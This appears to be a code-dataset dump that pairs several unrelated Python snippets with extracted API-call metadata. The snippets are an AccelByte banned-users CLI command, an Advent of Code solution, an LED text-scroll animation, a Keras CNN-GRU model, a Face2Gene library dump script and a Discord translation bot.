@click.argument("active_only", type=bool)
@click.argument("ban_type")
@click.argument("offset", type=int)
@click.argument("limit", type=int)
@click.option("--namespace")
@click.option("--doc", type=bool)
@click.option("--login_as", type=click.Choice(["client", "user"], case_sensitive=False))
def get_banned_users(
active_only,
ban_type,
limit,
offset,
namespace,
doc,
login_as,
):
login_as_internal(login_as)
if doc:
click.echo(admin_get_banned_users_v3.__doc__)
result, error = admin_get_banned_users_v3(
active_only=active_only,
ban_type=ban_type,
offset=offset,
limit=limit,
namespace=namespace,
)
if error:
raise Exception(str(error))
click.echo("Get banned users success.")
click.echo(yaml.safe_dump(result.to_dict()))
| [
"click.argument",
"click.echo",
"click.option",
"click.command",
"click.Choice",
"accelbyte_py_sdk.api.iam.admin_get_banned_users_v3"
] | [((144, 159), 'click.command', 'click.command', ([], {}), '()\n', (157, 159), False, 'import click\n'), ((161, 201), 'click.argument', 'click.argument', (['"""active_only"""'], {'type': 'bool'}), "('active_only', type=bool)\n", (175, 201), False, 'import click\n'), ((203, 229), 'click.argument', 'click.argument', (['"""ban_type"""'], {}), "('ban_type')\n", (217, 229), False, 'import click\n'), ((231, 265), 'click.argument', 'click.argument', (['"""offset"""'], {'type': 'int'}), "('offset', type=int)\n", (245, 265), False, 'import click\n'), ((267, 300), 'click.argument', 'click.argument', (['"""limit"""'], {'type': 'int'}), "('limit', type=int)\n", (281, 300), False, 'import click\n'), ((302, 329), 'click.option', 'click.option', (['"""--namespace"""'], {}), "('--namespace')\n", (314, 329), False, 'import click\n'), ((331, 363), 'click.option', 'click.option', (['"""--doc"""'], {'type': 'bool'}), "('--doc', type=bool)\n", (343, 363), False, 'import click\n'), ((716, 838), 'accelbyte_py_sdk.api.iam.admin_get_banned_users_v3', 'admin_get_banned_users_v3', ([], {'active_only': 'active_only', 'ban_type': 'ban_type', 'offset': 'offset', 'limit': 'limit', 'namespace': 'namespace'}), '(active_only=active_only, ban_type=ban_type,\n offset=offset, limit=limit, namespace=namespace)\n', (741, 838), False, 'from accelbyte_py_sdk.api.iam import admin_get_banned_users_v3\n'), ((936, 975), 'click.echo', 'click.echo', (['"""Get banned users success."""'], {}), "('Get banned users success.')\n", (946, 975), False, 'import click\n'), ((650, 695), 'click.echo', 'click.echo', (['admin_get_banned_users_v3.__doc__'], {}), '(admin_get_banned_users_v3.__doc__)\n', (660, 695), False, 'import click\n'), ((397, 451), 'click.Choice', 'click.Choice', (["['client', 'user']"], {'case_sensitive': '(False)'}), "(['client', 'user'], case_sensitive=False)\n", (409, 451), False, 'import click\n')] |
from aocd import get_data
def part1(a):
return sum(len(l) - len(l.encode('utf-8').decode('unicode_escape')) + 2 for l in a)
def part2(a):
return sum(len(l.encode('unicode_escape').decode('utf-8').replace('"', '\\"')) - len(l) + 2 for l in a)
if __name__ == '__main__':
data = get_data(day=8, year=2015)
inp = data.splitlines()
print(part1(inp))
print(part2(inp))
| [
"aocd.get_data"
] | [((294, 320), 'aocd.get_data', 'get_data', ([], {'day': '(8)', 'year': '(2015)'}), '(day=8, year=2015)\n', (302, 320), False, 'from aocd import get_data\n')] |
from adafruit_led_animation.animation import Animation
import adafruit_framebuf
class TextScroll(Animation):
def __init__(self, grid_object, speed, text, color, font_name='font5x8.bin', name=None):
self._text = text
self._font_name = font_name
self._frame = 0
# We're only using the frame buffer for on/off information, not color
self._buffer = bytearray(grid_object.width * grid_object.height)
self._fb = adafruit_framebuf.FrameBuffer(self._buffer, grid_object.width, grid_object.height, buf_format=adafruit_framebuf.MVLSB)
super().__init__(grid_object, speed, color, name=name)
on_cycle_complete_supported = True
def _get_color(self, x, y):
return self.color
def draw(self):
self._fb.fill(0x000000)
self._fb.text(self._text, self.pixel_object.width - self._frame, 0, 0xFFFFFF, font_name=self._font_name)
# Cheating to get the character width
char_width = self._fb._font.font_width
for y in range(self.pixel_object.height):
for x in range(self.pixel_object.width):
self.pixel_object[x, y] = self._get_color(x, y) if self._fb.pixel(x, y) else (0, 0, 0)
self._frame += 1
if self._frame >= len(self._text) * (char_width + 1) + self.pixel_object.width:
# Cycle completes after text scrolls completely out of view on the display
self.cycle_complete = True
self._frame = 0
def reset(self):
self._frame = 0 | [
"adafruit_framebuf.FrameBuffer"
] | [((461, 584), 'adafruit_framebuf.FrameBuffer', 'adafruit_framebuf.FrameBuffer', (['self._buffer', 'grid_object.width', 'grid_object.height'], {'buf_format': 'adafruit_framebuf.MVLSB'}), '(self._buffer, grid_object.width, grid_object.\n height, buf_format=adafruit_framebuf.MVLSB)\n', (490, 584), False, 'import adafruit_framebuf\n')] |
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers, models, activations
from models.cnn_gru.cnn import CNN, Encoder
class CnnGru(tf.keras.Model):
def __init__(self, seq_len):
super().__init__()
self.seq_len = seq_len
self.cnn = CNN()
ip_dims = self.cnn.compute_output_shape((None,None,None,5))[-1]
self.encoder = Encoder(self.cnn,ip_dims)
self.flatten = layers.Flatten()
self.drop = layers.Dropout(0.3)
self.fc1 = layers.Dense(128)
self.fc2 = layers.Dense(4)
def call(self, x, training=False):
x,_ = self.encoder(x)
x = self.flatten(x)
x = self.drop(x,training=training)
x = self.fc1(x)
x = tf.nn.relu(x)
x = self.fc2(x)
return x | [
"models.cnn_gru.cnn.Encoder",
"tensorflow.nn.relu",
"tensorflow.keras.layers.Dropout",
"tensorflow.keras.layers.Dense",
"models.cnn_gru.cnn.CNN",
"tensorflow.keras.layers.Flatten"
] | [((315, 320), 'models.cnn_gru.cnn.CNN', 'CNN', ([], {}), '()\n', (318, 320), False, 'from models.cnn_gru.cnn import CNN, Encoder\n'), ((416, 442), 'models.cnn_gru.cnn.Encoder', 'Encoder', (['self.cnn', 'ip_dims'], {}), '(self.cnn, ip_dims)\n', (423, 442), False, 'from models.cnn_gru.cnn import CNN, Encoder\n'), ((465, 481), 'tensorflow.keras.layers.Flatten', 'layers.Flatten', ([], {}), '()\n', (479, 481), False, 'from tensorflow.keras import layers, models, activations\n'), ((502, 521), 'tensorflow.keras.layers.Dropout', 'layers.Dropout', (['(0.3)'], {}), '(0.3)\n', (516, 521), False, 'from tensorflow.keras import layers, models, activations\n'), ((541, 558), 'tensorflow.keras.layers.Dense', 'layers.Dense', (['(128)'], {}), '(128)\n', (553, 558), False, 'from tensorflow.keras import layers, models, activations\n'), ((578, 593), 'tensorflow.keras.layers.Dense', 'layers.Dense', (['(4)'], {}), '(4)\n', (590, 593), False, 'from tensorflow.keras import layers, models, activations\n'), ((771, 784), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (781, 784), True, 'import tensorflow as tf\n')] |
'''Create an omim mapping based on information from Face2Gene using the
Face2Gene library.'''
from pprint import pprint
import json
from lib.api.face2gene import Face2Gene
from lib.model.config import ConfigManager
config_data = ConfigManager()
f2g_session = Face2Gene(config=config_data)
s_list = f2g_session.browse_all_syndromes()
with open("f2g_library_dump.json", "w") as f2g_dump:
json.dump(s_list, f2g_dump, indent=4)
| [
"lib.api.face2gene.Face2Gene",
"lib.model.config.ConfigManager",
"json.dump"
] | [((232, 247), 'lib.model.config.ConfigManager', 'ConfigManager', ([], {}), '()\n', (245, 247), False, 'from lib.model.config import ConfigManager\n'), ((263, 292), 'lib.api.face2gene.Face2Gene', 'Face2Gene', ([], {'config': 'config_data'}), '(config=config_data)\n', (272, 292), False, 'from lib.api.face2gene import Face2Gene\n'), ((396, 433), 'json.dump', 'json.dump', (['s_list', 'f2g_dump'], {'indent': '(4)'}), '(s_list, f2g_dump, indent=4)\n', (405, 433), False, 'import json\n')] |
from googletrans import LANGUAGES
from googletrans import Translator
translator = Translator()
async def ajuda(message, comandos :dict):
msg = "```\n"
for c in comandos.keys():
msg += comandos[c][1]+'\n'
msg += "```"
await message.channel.send(msg)
async def traduz(message, _):
msg = message.content.strip().lower().split()
if len(msg)<4:
return Exception
cod1 = msg[-1]
cod2 = msg[-2]
if (len(cod1) > 2 and cod1 in list(LANGUAGES.values())):
for k in LANGUAGES.keys():
if LANGUAGES[k] == cod1:
cod1 = k
elif (len(cod1) == 2 and cod1 not in list(LANGUAGES.keys())):
return Exception
if (len(cod2) > 2 and cod2 in list(LANGUAGES.values())):
for k in LANGUAGES.keys():
if LANGUAGES[k] == cod2:
cod2 = k
elif (len(cod2) == 2 and cod2 not in list(LANGUAGES.keys())):
return Exception
msg = ' '.join(msg[1:-2])
out = translator.translate(text=msg, dest=cod1, src=cod2).text
await message.channel.send(out)
async def linguas(message, _):
msg = "```\n"
for k in LANGUAGES.keys():
msg += str(k)+' - '+str(LANGUAGES[k])+'\n'
msg += "```"
await message.channel.send(msg)
| [
"googletrans.LANGUAGES.values",
"googletrans.Translator",
"googletrans.LANGUAGES.keys"
] | [((83, 95), 'googletrans.Translator', 'Translator', ([], {}), '()\n', (93, 95), False, 'from googletrans import Translator\n'), ((1063, 1079), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (1077, 1079), False, 'from googletrans import LANGUAGES\n'), ((495, 511), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (509, 511), False, 'from googletrans import LANGUAGES\n'), ((721, 737), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (735, 737), False, 'from googletrans import LANGUAGES\n'), ((460, 478), 'googletrans.LANGUAGES.values', 'LANGUAGES.values', ([], {}), '()\n', (476, 478), False, 'from googletrans import LANGUAGES\n'), ((686, 704), 'googletrans.LANGUAGES.values', 'LANGUAGES.values', ([], {}), '()\n', (702, 704), False, 'from googletrans import LANGUAGES\n'), ((605, 621), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (619, 621), False, 'from googletrans import LANGUAGES\n'), ((831, 847), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (845, 847), False, 'from googletrans import LANGUAGES\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.